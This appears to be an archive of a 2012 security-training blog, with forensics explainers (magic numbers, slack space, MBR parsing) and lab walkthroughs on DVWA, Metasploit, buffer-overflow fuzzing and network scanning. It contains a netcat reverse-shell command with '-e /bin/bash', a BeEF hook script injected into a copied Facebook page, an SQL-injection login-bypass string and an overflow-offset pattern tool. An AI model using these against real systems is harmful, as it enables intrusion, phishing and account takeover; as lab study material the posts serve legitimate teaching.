Pages

Sunday, 18 March 2012

Magic Numbers

Magic numbers are common in programs across many operating systems. A magic number is a fixed constant written into a file or data structure, usually at its start, and is a form of in-band signalling: the program that reads the data checks the constant at run time to learn what type of data it holds. Many file formats carry such a constant identifying their contents, so checking for it is a simple and effective way of distinguishing formats without trusting the file name or extension, and the header it belongs to can yield further run-time information such as the format version.

Examples:
GIF image files begin with the ASCII codes for "GIF89a" (47 49 46 38 39 61) or "GIF87a" (47 49 46 38 37 61).
PDF files start with "%PDF" (hex 25 50 44 46).

JPEG File Structure

JPEG (Joint Photographic Experts Group) names both a standards committee and the image compression method it defined. The JPEG File Interchange Format (JFIF) was developed by C-Cube Microsystems for storing JPEG-encoded data. JFIF is designed so that files containing JPEG-encoded data streams can be exchanged between otherwise incompatible systems and applications.

A JFIF file is basically a JPEG data stream with a few restrictions and an identifying marker: the stream opens with the SOI marker (FF D8) and the first segment is an APP0 segment (FF E0) whose payload starts with the ASCII string "JFIF" followed by a null byte. To understand the JFIF format you need to understand JPEG's marker structure.
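As an added example (not code from the original post), here is a small Python checker that identifies a file by its leading bytes using the GIF and PDF signatures listed above plus the JPEG start-of-image marker, and then parses the JFIF APP0 segment described in the JFIF section. The sample bytes are constructed inline, and the expected-extension table and function names are my own.

```python
import os
import struct

# Magic-byte signatures: the GIF and PDF constants from the text, plus the JPEG
# start-of-image marker (FF D8 FF). Added example, not code from the original page.
SIGNATURES = [
    (b"GIF89a", "GIF (89a)"),
    (b"GIF87a", "GIF (87a)"),
    (b"%PDF", "PDF"),
    (b"\xff\xd8\xff", "JPEG"),
]

# Assumed mapping from detected type to the extensions we are willing to accept.
EXPECTED_EXT = {
    "GIF (89a)": {".gif"},
    "GIF (87a)": {".gif"},
    "PDF": {".pdf"},
    "JPEG": {".jpg", ".jpeg"},
}


def identify(data: bytes) -> str:
    """Name the format from the leading magic bytes, or 'unknown' if none match."""
    for magic, name in SIGNATURES:
        if data.startswith(magic):
            return name
    return "unknown"


def extension_matches(filename: str, data: bytes) -> bool:
    """True only when the content's magic agrees with the file's extension.
    Rejecting mismatches is the usual defence against renamed uploads."""
    kind = identify(data)
    ext = os.path.splitext(filename)[1].lower()
    return kind != "unknown" and ext in EXPECTED_EXT[kind]


def parse_jfif_app0(data: bytes):
    """Parse the JFIF APP0 segment that must directly follow the SOI marker.
    Returns version/units/density, or None for a JPEG stream that is not JFIF."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG stream: missing SOI marker FF D8")
    if data[2:4] != b"\xff\xe0":
        return None  # APP0 absent (e.g. an Exif file puts APP1 first)
    (length,) = struct.unpack(">H", data[4:6])  # big-endian, counts itself
    segment = data[6:4 + length]
    if segment[:5] != b"JFIF\x00":
        return None
    major, minor, units, xdens, ydens = struct.unpack(">BBBHH", segment[5:12])
    return {"version": f"{major}.{minor:02d}", "units": units, "density": (xdens, ydens)}


# Constructed sample: a minimal JFIF header (no thumbnail) followed by EOI.
SAMPLE_JFIF = (
    b"\xff\xd8\xff\xe0" + struct.pack(">H", 16) + b"JFIF\x00"
    + bytes([1, 1, 0]) + struct.pack(">HH", 72, 72) + b"\x00\x00" + b"\xff\xd9"
)
SAMPLE_PDF = b"%PDF-1.4\n%\xe2\xe3\xcf\xd3\n"  # constructed PDF header

if __name__ == "__main__":
    print(identify(SAMPLE_JFIF), parse_jfif_app0(SAMPLE_JFIF))
    print(identify(SAMPLE_PDF), extension_matches("report.jpg", SAMPLE_PDF))
```

The extension check is the practical use of magic numbers in an upload filter: a PDF renamed to report.jpg is rejected because its content says PDF while its name says JPEG.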

Unallocated Space

Unallocated space, sometimes called "free space", is logical space on a hard drive that the operating system (for example Windows) can write to. Put another way, it is the opposite of "allocated" space, which is where the operating system has already written files.

Example.

If the operating system writes a file to a certain area of the hard drive, that part of the drive is now "allocated": the file is using the space, and no other file can be written to that area. If that file is deleted, that part of the drive no longer needs to be allocated and becomes unallocated, which means new files can be written to that location. Until that happens, the deleted file's content usually remains on disk, which is why forensic tools can recover it from unallocated space.

Slack Space

Slack space, sometimes called file slack, is the area between the end of a file and the end of the last cluster (or sector) allocated to that file. The file system will not use that area to store anything else while the file occupies the cluster, so it is "wasted". Slack space is common in file systems that use a large cluster size, while a file system with a small cluster size can organise the storage medium more effectively and efficiently. The amount of wasted disk space can be estimated by multiplying the number of files (including directories) by half the cluster size. For example, a personal computer holding 10,000 files on a file system with a 4 KB cluster size will have approximately 10,000 x 2 KB = 20,000 KB, about 20 MB, of slack. On a large file server the slack space can reach tens of gigabytes. Forensically, the slack bytes on disk often still contain whatever earlier file occupied that cluster, so they are worth carving.
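To make the estimate above concrete, here is an added Python example (not from the original post) that computes the exact slack of each file, the region a forensic tool would carve, and the total, and compares the total with the half-a-cluster rule of thumb. The file sizes are constructed, not measured.

```python
# Added example (not from the original post): exact slack per file vs. the
# half-a-cluster rule of thumb. File sizes below are constructed, not measured.

def slack_bytes(file_size: int, cluster_size: int) -> int:
    """Bytes between the end of the file and the end of its last cluster.
    An empty file owns no cluster, and an exact multiple leaves no slack."""
    if file_size == 0:
        return 0
    return (-file_size) % cluster_size


def slack_region(file_size: int, cluster_size: int):
    """(offset, length) of the slack area relative to the start of the file's
    first cluster; this is the range a forensic tool would carve for leftovers."""
    return file_size, slack_bytes(file_size, cluster_size)


def total_slack(file_sizes, cluster_size: int) -> int:
    """Exact slack across a set of files."""
    return sum(slack_bytes(s, cluster_size) for s in file_sizes)


def estimated_slack(file_count: int, cluster_size: int) -> int:
    """The rule of thumb in the text: roughly half a cluster wasted per file."""
    return file_count * cluster_size // 2


SAMPLE_SIZES = [100, 4096, 5000, 0, 8191]  # constructed file sizes in bytes
CLUSTER = 4096

if __name__ == "__main__":
    for size in SAMPLE_SIZES:
        print(size, slack_region(size, CLUSTER))
    print("exact:", total_slack(SAMPLE_SIZES, CLUSTER),
          "estimate:", estimated_slack(len(SAMPLE_SIZES), CLUSTER))
    # 10,000 files at 4 KB clusters: about 20 MB, the figure the text arrives at
    print(estimated_slack(10_000, CLUSTER) / 2**20, "MiB")
```

The estimate is only statistical: a handful of files can be far from it (here 7,189 exact versus 10,240 estimated), but over tens of thousands of files the average slack does converge on half a cluster.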

Thursday, 15 March 2012

File System Structure

A file system is the logical structure used to control access to data on a disk. It provides the mechanism for storing the data and programs owned by the operating system and by all users of the computer system. A file system has two parts:
1. A collection of files, each of which stores related data.
2. A directory structure that organises the files and holds information about every file in the system.
Every operating system, from DOS and Windows to Macintosh and the UNIX derivatives, has its own file system that places files in a hierarchical structure. Examples include FAT, NTFS, HFS and HFS+, ext2, ext3, ISO 9660, ODS-5 and UDF. Some are journaling or versioning file systems. The file system also determines the file-naming convention and how files are laid out in the directory structure. The three types of file naming on a Windows system are:

MBR (Master Boot Record )

The MBR occupies a special and very important place on a hard disk. It is created automatically when the first partition on the disk is created.

The MBR is a critical data structure: it holds the partition table and a small amount of executable boot code (the first stage of loading the operating system). It is always located in the first sector of the disk (sector 0, 512 bytes), with the four 16-byte partition-table entries at offset 446 and the 55 AA signature in the last two bytes.
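As an added example (not code from the original post), this Python parser reads the partition table out of a 512-byte MBR sector and then lists the sector ranges no partition covers, which is where bootkits and hidden data are usually found. The sample sector is constructed in code; the partition sizes and the disk size are arbitrary.

```python
import struct

# Added example, not code from the original post. Layout facts used here are the
# standard MBR: 446 bytes of boot code, four 16-byte partition entries, 55 AA.
MBR_SIZE = 512
TABLE_OFFSET = 446
ENTRY_SIZE = 16
BOOT_SIGNATURE = b"\x55\xaa"


def parse_mbr(sector: bytes):
    """Return the non-empty partition entries of a 512-byte MBR sector."""
    if len(sector) != MBR_SIZE:
        raise ValueError("MBR must be exactly 512 bytes")
    if sector[510:512] != BOOT_SIGNATURE:
        raise ValueError("missing 55 AA boot signature")
    entries = []
    for i in range(4):
        off = TABLE_OFFSET + i * ENTRY_SIZE
        # status(1) CHS-start(3, skipped) type(1) CHS-end(3, skipped) LBA-start(4) sectors(4)
        status, ptype, lba_start, sectors = struct.unpack_from("<B3xB3xII", sector, off)
        if ptype == 0:
            continue  # empty slot
        entries.append({"index": i, "bootable": status == 0x80, "type": ptype,
                        "lba_start": lba_start, "sectors": sectors})
    return entries


def unallocated_gaps(entries, disk_sectors: int):
    """Sector ranges (start, length) that no partition covers, beginning at sector 1
    (sector 0 is the MBR itself). The gap before the first partition is the one
    to inspect first when looking for hidden code or data."""
    gaps = []
    cursor = 1
    for p in sorted(entries, key=lambda e: e["lba_start"]):
        if p["lba_start"] > cursor:
            gaps.append((cursor, p["lba_start"] - cursor))
        cursor = max(cursor, p["lba_start"] + p["sectors"])
    if disk_sectors > cursor:
        gaps.append((cursor, disk_sectors - cursor))
    return gaps


def build_sample_mbr() -> bytes:
    """Constructed sector: a bootable NTFS (0x07) partition and a Linux (0x83) one."""
    entry0 = struct.pack("<B3sB3sII", 0x80, b"\0" * 3, 0x07, b"\0" * 3, 2048, 204800)
    entry1 = struct.pack("<B3sB3sII", 0x00, b"\0" * 3, 0x83, b"\0" * 3, 206848, 1000000)
    table = entry0 + entry1 + b"\0" * (ENTRY_SIZE * 2)
    return b"\0" * TABLE_OFFSET + table + BOOT_SIGNATURE


if __name__ == "__main__":
    parts = parse_mbr(build_sample_mbr())
    for p in parts:
        print(p)
    print(unallocated_gaps(parts, disk_sectors=2_000_000))
```

On a real image you would read the first 512 bytes of the device (for example with dd) and pass them to parse_mbr; the total sector count comes from the image size divided by 512.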

Monday, 05 March 2012

DVWA Advanced Hacking

First,
start the MySQL and Apache servers, then browse to 192.168.43.1/dvwa. Pressing Enter opens DVWA.


Wednesday, 29 February 2012

Monday, 27 February 2012

use metasploit and beef

First step:
save the page source of facebook.com, insert <script src='http://127.0.0.1/beef/hook/beefmagic.js.php'></script> into it, and save the modified source as an .html file.


What is Social Engineering and the Social Engineering Toolkit

Social engineering
       Social engineering is a term that describes a non-technical kind of intrusion that relies heavily on human interaction and often involves tricking other people to break normal security procedures.
        Social engineering is a component of many, if not most, types of exploits. Virus writers use social engineering tactics to persuade people to run malware-laden email attachments, phishers use social engineering to convince people to divulge sensitive information, and scareware vendors use social engineering to frighten people into running software that is useless at best and dangerous at worst.

Examples of the Use of Auxiliary Tools.

Any Metasploit module that is not an exploit is an auxiliary module, which leaves a lot to the imagination: scanners, fuzzers, sniffers and the like all fall into this category.

Open msfconsole in a terminal, wait until the msf prompt appears, then type show auxiliary, press Enter and look at the result (Tab completion also works on module paths).

What are MSFpayload and MSFencode, and How to Use Them

Msfpayload :

Msfpayload is one of the many great tools included with the Metasploit Framework. It can be used to create customized payloads. To run Msfpayload, first select one of the many payloads included in the framework. Then provide the parameters for the payload and the output format you want it to generate, and it will create a customized payload for you. You can take the resulting file and include it in your own exploits written in C, Ruby, Perl, Java or other languages. It also has the ability to create executable programs. These

Friday, 24 February 2012

Exploiting a Linux Stack Overflow

Let's do it.

First step
before the exploit we must turn off Linux ASLR (address space layout randomisation); otherwise stack addresses change on every run and a hard-coded return address will not work.

Check the current ASLR setting:
type: cat /proc/sys/kernel/randomize_va_space
A value of 0 means ASLR is off, 1 randomises the stack, VDSO and mmap addresses, and 2 (the usual default) also randomises the heap (brk). Writing 0 to this file as root turns ASLR off for the whole system.

Wednesday, 22 February 2012

Exploit Easy Chat Server (SEH & SafeSEH)

Now we try to exploit Easy Chat Server.

First step

Use Wireshark to see the vulnerable request to Easy Chat Server. Once we know the vulnerable field, write a fuzzer to see how it can be overflowed. To capture the request, register a user first and then look at the result in Wireshark.

Friday, 17 February 2012

Tuesday, 14 February 2012

Direct Return Exploit (3): VUPlayer

This time we try to exploit VUPlayer.

First step

Pattern of attack.
First we check whether it can be overflowed: in Notepad, write a very long run of the character "a". If the player crashes when it loads the file, we know it can be overflowed.
Save the file in .wax playlist format as spirit.wax and open spirit.wax with VUPlayer.

Sunday, 12 February 2012

Direct Return Exploit (2): Mini-stream RM-MP3 Converter

Now we try to exploit Mini-stream RM-MP3 Converter.

First step

Write a fuzzer to trigger an error.
Once Mini-stream crashes (the window disappears when it loads the file), we know we have triggered the error.

Sunday, 05 February 2012

Install warFTP on Windows XP SP2

To install warFTP 1.65:
Download warFTP (you can find it with Google).
Double-click warFTP 1.65 and it will extract warFTP, as shown below.

Direct Return Exploit (1): FTP Server on Windows XP SP3

Now we will try to exploit the FTP server on Windows XP SP2. Before starting, prepare the requirements for exploitation:
1. Download WarFTP
2. Download OllyDbg
3. Fuzzer
Once everything is ready, install WarFTP and OllyDbg on your Windows machine.

First step
Open your FTP server and click
Properties - Start service
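The crash files written in the Easy Chat Server, VUPlayer, Mini-stream and WarFTP posts above all start from a long run of one character, which tells you that the program crashes but not where in the input the saved return address sits. As an added example (not code from the original posts), this Python script reproduces the usual cyclic-pattern technique, using the same alphabet as Metasploit's pattern_create, so that the register value seen in the debugger can be turned into an exact offset. The file name spirit.wax follows the VUPlayer post; the length and the sample crash value are arbitrary.

```python
import string
import struct

# Added example, not code from the original posts. Same alphabet and order as
# Metasploit's pattern_create: UPPER lower digit, cycling the digit fastest.

PATTERN_MAX = 26 * 26 * 10 * 3  # 20280 bytes before the sequence would repeat


def pattern_create(length: int) -> bytes:
    """Aa0Aa1Aa2...: a 4-byte slice taken anywhere inside the first PATTERN_MAX
    bytes locates a single position in the pattern."""
    out = bytearray()
    for up in string.ascii_uppercase:
        for low in string.ascii_lowercase:
            for dig in string.digits:
                out += (up + low + dig).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(value, length: int = PATTERN_MAX) -> int:
    """Offset of a crash value inside the pattern, or -1 if it did not come from
    the pattern. An int is treated as an x86 register value (little-endian), so
    EIP = 0x41336141 is searched as the bytes b"Aa3A"; bytes are searched as-is."""
    needle = struct.pack("<I", value) if isinstance(value, int) else value
    return pattern_create(length).find(needle)


def write_crash_file(path: str, length: int) -> int:
    """Write the pattern as the playlist body, in place of the run of 'a' characters."""
    data = pattern_create(length)
    with open(path, "wb") as f:
        f.write(data)
    return len(data)


if __name__ == "__main__":
    write_crash_file("spirit.wax", 5000)
    # If EIP reads 0x41336141 after the crash, the overwrite sits 9 bytes into the file.
    print(pattern_offset(0x41336141))
```

Open the generated file in the target, read EIP (or the SEH handler address, for the Easy Chat Server case) from OllyDbg after the crash, and feed that value to pattern_offset; a result of -1 means the register was not overwritten by your input at all.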

Saturday, 04 February 2012

Structure of the Memory Registers

Before going further into the structure of memory and registers, we should first understand what memory is and what registers are.

What is memory?
Memory is where information of all kinds is stored as binary numbers. The information is encoded into binary form by instructions that turn it into a sequence of numbers. For example, the letter F is stored as the decimal number 70 (binary 01000110) under one encoding method (ASCII). More complex encodings are used to store pictures, sound, video and other kinds of information. The information held in a single cell is called a byte.

Installing OllyDbg on Windows XP SP3

Installing OllyDbg is easy.
First download OllyDbg: Download OllyDbg

Open the folder where the download was saved and extract OllyDbg.

Description of OllyDbg


A debugger is software used to test and "debug" code. OllyDbg is an application-level debugger for analysis. For each module (executable or DLL file) it tries to separate code from data, identify procedures, find embedded strings and switch tables, determine loops and switches, find function calls and decode their arguments, and even predict the values of registers.

If you need to see where an error occurred in a piece of code you have just compiled, you can run it through a debugger to find the problem. There is plenty of software out there that could be considered a debugger, but most do not go into the same depth of detail as OllyDbg does.

Wednesday, 01 February 2012

Information Gathering Assignment


Description of mkfifo

mkfifo makes a FIFO special file with the name pathname. mode specifies the FIFO's permissions. It is modified by the process's umask in the usual way: the permissions of the created file are (mode & ~umask).
A FIFO special file is similar to a pipe, except that it is created in a different way. Instead of being an anonymous communication channel, a FIFO special file is entered into the file system by calling mkfifo.
Once you have created a FIFO special file in this way, any process can open it for reading or writing, in the same way as an ordinary file. However, it has to be open at both ends simultaneously before you can do any input or output on it. Opening a FIFO for reading normally blocks until some other process opens the same FIFO for writing, and vice versa. See fifo(4) for non-blocking handling of FIFO special files.
mkfifo() is vulnerable to classic TOCTOU (time-of-check to time-of-use) attacks: if a program checks a path (for example with stat or access) and only then calls mkfifo on it, an attacker who can write to that directory can plant a file or symlink at that path in between.
A call to mkfifo() should be flagged if its first argument (the file name) was used previously in a check.
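As an added example (not code from the original post), the following Python puts the check-then-create pattern the text flags next to the safe form, in which mkfifo is called first and the kernel's EEXIST result is handled, and then shows the blocking open behaviour described above by passing a message through the FIFO between two threads. Function names are my own; the demo runs in a fresh temporary directory.

```python
import os
import stat
import tempfile
import threading

# Added example, not code from the original post. Function names are my own.


def racy_make_fifo(path: str, mode: int = 0o600) -> bool:
    """The pattern the text warns about: exists() and mkfifo() are two system calls,
    and an attacker who can write to the directory may plant a file or symlink at
    `path` between them."""
    if os.path.exists(path):
        return False
    os.mkfifo(path, mode)
    return True


def safe_make_fifo(path: str, mode: int = 0o600) -> bool:
    """Create the FIFO first and let the kernel report EEXIST; then confirm that what
    is there is really a FIFO (lstat, so a symlink is not followed). Returns True if
    this call created it, False if a FIFO already existed."""
    try:
        os.mkfifo(path, mode)
        return True
    except FileExistsError:
        if not stat.S_ISFIFO(os.lstat(path).st_mode):
            raise RuntimeError(f"{path} exists and is not a FIFO")
        return False


def fifo_roundtrip(path: str, payload: bytes) -> bytes:
    """open() on a FIFO blocks until the other end is open, so the writer runs in a
    thread; read() returns once the writer closes its end."""
    def writer():
        with open(path, "wb") as w:
            w.write(payload)
    t = threading.Thread(target=writer)
    t.start()
    with open(path, "rb") as r:
        data = r.read()
    t.join()
    return data


def demo() -> tuple:
    """Run the checks in a fresh temporary directory and return the results."""
    d = tempfile.mkdtemp()
    p = os.path.join(d, "demo.fifo")
    created_first = safe_make_fifo(p)      # True: we created it
    created_again = safe_make_fifo(p)      # False: already a FIFO, no race window
    racy_says = racy_make_fifo(p)          # False here, but only because nobody raced us
    is_fifo = stat.S_ISFIFO(os.lstat(p).st_mode)
    data = fifo_roundtrip(p, b"hello through the fifo")
    return created_first, created_again, racy_says, is_fifo, data


if __name__ == "__main__":
    print(demo())
```

The difference is not in what the two creators return on an idle system but in what happens under attack: racy_make_fifo will happily call mkfifo on a path that an attacker replaced after the exists() check, whereas safe_make_fifo never trusts a prior check and refuses anything at the path that is not a FIFO.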

Exploit DVWA using sql injection

First step
start your Apache and MySQL services,
then browse to localhost/dvwa and the DVWA page will open.
Now
log in with
user : admin
pass : password

Definition of Google Hacking

Google hacking is a technique used in the hacking world that exploits Google's search capability to find information, from the mundane to the very sensitive, held in the search engine's database. Search engines such as Google use software called spiders or crawlers whose task is to follow every existing web page and store the information found on the World Wide Web on Google's own servers. The content is then indexed, so that anyone who needs information on something only has to enter a keyword and the search becomes easy. This is what hackers exploit to find victims. It is not unusual for information such as passwords, credit card numbers, account numbers and other confidential data that should be known only to its owner to be discoverable through a search engine like Google.
    

Definition of SHODAN

Shodan is a search engine that lets you find specific computers (routers, servers, etc.) using various filters. Some also describe it as a directory of service banners, or a banner search engine. Web search engines such as Google and Bing are great for finding websites. But what if you are interested in finding computers running a particular piece of software (such as Apache)? Or want to know which version of Microsoft IIS is the most popular? Or want to see how many anonymous FTP servers there are? Or a new vulnerability appears and you want to see how many hosts it could affect? So what does Shodan index? Most of its data is taken from 'banners', the metadata a server sends back to a client. This can be information about the server software, supported service options, a welcome message, or anything else a client might want to know before interacting with the server.

What is Tor and The Proxy Chain

Tor Definition
 
Tor is a system of virtual tunnels that hides our identity while surfing the internet.

A fuller definition, from http://en.wikipedia.org/wiki/Tor_%28anonymity_network%29:


Tor (short for The Onion Router) is a system intended to enable online anonymity. Tor client software routes Internet traffic through a worldwide volunteer network of servers in order to conceal a user's location or usage from anyone conducting network surveillance or traffic analysis. Using Tor makes it more difficult to trace Internet activity, including "visits to Web sites, online posts, instant messages and other communication forms", back to the user and is intended to protect users' personal freedom, privacy, and ability to conduct confidential business by keeping their internet activities from being monitored.

Bypass localhost/fbip

First step

start the Apache and MySQL services,
open your browser and enter localhost/fbip in the URL bar.


Second step
now we try to provoke an error on this site: type ' or '1'='1'# into the form.
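To show why the payload in this post and in the DVWA SQL injection post works, here is an added Python example (not code from the original posts, and not DVWA's code) that runs the same login query against an in-memory SQLite table in two forms: string concatenation, which the payload breaks out of, and a parameterised query, which it cannot. The users table is constructed; the page's payload ends in a MySQL '#' comment that SQLite does not understand, so the variant without the comment is used.

```python
import sqlite3

# Added example, not code from the original posts or from DVWA. The users table is
# constructed in memory; the page's payload ends in a MySQL '#' comment, which SQLite
# does not understand, so the variant without the comment is used here.


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("admin", "password"), ("gordonb", "abc123")])
    return db


def vulnerable_login(db, username: str, password: str):
    """String concatenation: user input becomes part of the SQL grammar."""
    query = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
             % (username, password))
    row = db.execute(query).fetchone()
    return row[0] if row else None


def safe_login(db, username: str, password: str):
    """Parameterised query: the same input is only ever compared as a string."""
    row = db.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


PAYLOAD = "' or '1'='1"  # the bypass from the fbip post, minus the MySQL '#'

if __name__ == "__main__":
    db = make_db()
    # WHERE username = 'nobody' AND password = '' or '1'='1' -> AND binds tighter,
    # so the OR makes the whole condition true and the first row (admin) comes back.
    print(vulnerable_login(db, "nobody", PAYLOAD))
    print(safe_login(db, "nobody", PAYLOAD))  # None
```

On MySQL the trailing # in the page's payload comments out whatever the application appends after the injected value, so the effect is the same with or without it there; the fix in both cases is the parameterised form, not filtering quote characters.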

Monday, 30 January 2012

Revision: Planting Cymothoa Using nc on Ubuntu.

First step
open your terminal on BackTrack and start a listener:
root@bt:~# nc -l -v -p 1010


It is now listening.
Now go to the Ubuntu machine, open a terminal and type: nc 192.168.43.1 1010 -e /bin/bash


Then go back to the BackTrack terminal and watch the listener:
root@bt:~# nc -l -v -p 1010
listening on [any] 1010 ...
192.168.43.130: inverse host lookup failed: Unknown server error : Connection timed out
connect to [192.168.43.1] from (UNKNOWN) [192.168.43.130] 36426

Cracking Passwords Using John the Ripper

This tutorial continues from the privilege escalation post, where we obtained password hashes.

Copy the hashes obtained during privilege escalation into an editor such as gedit or nano and save them to a file.
Then run the cracking command.

Privilege Escalation

First step

Information gathering and service enumeration

target IP: 192.168.0.21
scanning with
Zenmap and Netifera
using Zenmap
using Netifera



Friday, 27 January 2012

Exploiting Windows XP using Metasploit

First step
Information gathering and service enumeration

scan the network 192.168.43.0/24 with an nmap ping sweep (-sP lists the hosts that respond without port-scanning them)
root@bt:~# nmap -sP 192.168.43.0/24

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-01-28 04:09 WIT
Nmap scan report for 192.168.43.1
Host is up.
Nmap scan report for 192.168.43.2
Host is up (0.00053s latency).
MAC Address: 08:00:27:5F:74:EC (Cadmus Computer Systems)
Nmap scan report for 192.168.43.254
Host is up (0.00077s latency).
MAC Address: 00:50:56:F8:58:F4 (VMware)
Nmap done: 256 IP addresses (3 hosts up) scanned in 7.87 seconds

Scanning for vulnerabilities using Nessus and exploiting them using exploit-db

Scanning for vulnerabilities using Nessus



First step

start Nessus from the console: /etc/init.d/nessusd start
root@bt:~# /etc/init.d/nessusd start
Starting Nessus : .

Second step
open a browser and go to localhost:8834 (the Nessus web interface is served over HTTPS). Log in with your user name and password.
Press Login.
Press Scan - Add and the page shown below will open.

Wednesday, 25 January 2012

Gathering information about 3 websites

In this second meeting we gather information on the following 3 websites:

 

http://is2c-dojo.com/

Passive information gathering

root@bt:~# whois is2c-dojo.com

Whois Server Version 2.0

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

   Domain Name: IS2C-DOJO.COM
   Registrar: CV. JOGJACAMP
   Whois Server: whois.resellercamp.com
   Referral URL: http://www.resellercamp.com
   Name Server: NS1.PARTNERIT.US
   Name Server: NS2.PARTNERIT.US
   Status: clientTransferProhibited
   Updated Date: 14-jan-2012
   Creation Date: 14-jan-2012
   Expiration Date: 14-jan-2013

Gathering information about localhost and a website

First step

see our IP address:
dhclient eth0
There is already a pid file /var/run/dhclient.pid with pid 4219
killed old client process, removed PID file
Internet Systems Consortium DHCP Client V3.1.3
Copyright 2004-2009 Internet Systems Consortium.
All rights reserved.
For info, please visit https://www.isc.org/software/dhcp/

Listening on LPF/eth0/00:26:22:73:84:f3
Sending on LPF/eth0/00:26:22:73:84:f3
Sending on Socket/fallback
DHCPREQUEST of 192.168.0.24 on eth0 to 255.255.255.255 port 67
DHCPACK of 192.168.0.24 from 192.168.0.40
bound to 192.168.0.24 -- renewal in 292629 seconds.

Install Nessus on BackTrack 5 R1

First step
download Nessus from this website
http://www.nessus.org/products/nessus/nessus-download-agreement
on that page press Agree and download
Nessus-4.4.1-debian5_i386.deb

After you have downloaded Nessus,
open your terminal to install it.
Type

Monday, 23 January 2012

Network configuration for BackTrack, Ubuntu and Windows XP SP3

First step
open a terminal on BackTrack (the host)
and type "ifconfig".

From this output we can see the host adapter configured for the virtual machines:
1. vmnet1
  vmnet1    Link encap:Ethernet  HWaddr 00:50:56:c0:00:01 
          inet addr:192.168.43.1  Bcast:192.168.43.255  Mask:255.255.255.0
          inet6 addr: fe80::250:56ff:fec0:1/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:103 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

Install Ubuntu 10.10 on VirtualBox

The steps for creating the Ubuntu 10.10 VM on BackTrack are the same as for the Windows VM;
you can see them here
http://scx010c073.blogspot.com/2012/01/install-winodows-xp-on-virtualbox.html


Now we install Ubuntu 10.10 on VirtualBox.


First boot Ubuntu


and press Try Ubuntu.

Install Windows XP SP3 on VirtualBox

First step
open VirtualBox
and press the New button